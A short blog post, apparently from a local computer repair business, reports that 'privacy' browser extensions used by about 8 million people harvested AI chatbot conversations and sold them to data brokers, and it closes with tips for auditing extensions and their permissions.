8M Users’ AI Conversations Sold for Profit by “Privacy” Extensions

8M Users’ AI Conversations Sold for Profit by “Privacy” Extensions

December 16, 2025

### The Great Betrayal: How “Privacy” Extensions Harvested and Sold Your AI Conversations

In the rapidly evolving world of artificial intelligence, we trust our tools. We confide in AI chatbots, asking them to draft sensitive emails, debug proprietary code, or even offer personal advice. To enhance this experience, millions have turned to browser extensions that promise added features, better privacy, and a smoother interface. But a recent investigation has uncovered a deeply unsettling truth: the very tools meant to help were secretly betraying their users on a massive scale.

Reports have revealed that a network of popular browser extensions, installed by over 8 million people, were systematically scraping user conversations from AI services like ChatGPT and Google Bard. This harvested data, filled with potentially sensitive and personal information, was then packaged and sold for profit to data brokers.

**The Deceptive Promise**

The extensions often operated under the guise of utility. They offered features like conversation summaries, enhanced user interfaces, or promises of “securing” your chats. Users, believing they were upgrading their AI experience, granted these extensions permissions to “read and change data” on the websites they visited. This seemingly innocuous permission was the key that unlocked the vault. Once installed, the extensions silently siphoned a complete copy of every prompt and every AI-generated response.

The irony is staggering. Some of these tools were explicitly marketed with the language of privacy and security, preying on the very users who were most conscious of their digital footprint. Instead of acting as a shield, they became a conduit for one of the most intimate forms of data harvesting seen to date.

**The New Gold Rush: AI Training Data**

Who would buy this data? The answer lies in the insatiable appetite of the AI industry. Companies racing to build their own Large Language Models (LLMs) require colossal amounts of high-quality training data. Human-AI conversations are a goldmine, providing perfect examples of natural language queries, user intent, and relevant responses.

The collected data was sold to data brokerage firms, who would then offer it to other tech companies. While the data was supposedly “anonymized,” the nature of these conversations makes true anonymization nearly impossible. Users often input personally identifiable information (PII), including names, addresses, contact details, confidential work projects, and deeply personal secrets. A few lines of a unique problem or personal story can be enough to de-anonymize an individual with terrifying ease.

**How to Protect Yourself**

This incident serves as a stark reminder that the digital tools we use can have hidden costs. The responsibility for security is, unfortunately, often pushed onto the end-user. To protect yourself from similar threats, consider the following steps:

1. **Audit Your Extensions:** Regularly review the browser extensions you have installed. If you don’t recognize one or no longer use it, remove it immediately.
2. **Scrutinize Permissions:** Before installing any extension, carefully examine the permissions it requests. Be highly suspicious of any tool that asks for broad access, especially the ability to read all data on all websites, unless it is absolutely essential for its core function.
3. **Vet the Developer:** Stick to extensions from well-known, reputable developers. Read reviews, but look beyond the star rating. Search for articles or security reports related to the extension or its publisher.
4. **Use Official Apps:** Whenever possible, use the official web interface or dedicated desktop applications for AI services rather than relying on third-party add-ons.

The line between user and product has never been blurrier. As we navigate the new landscape shaped by AI, our conversations have become a valuable commodity. This breach of trust by millions highlights a critical vulnerability in the ecosystem, proving that in the quest for data, even our most private thoughts are for sale.

Leave A Comment

Effective computer repair and coding solutions from right here in Võrumaa. Your project gets done fast, professionally,
and without any fuss.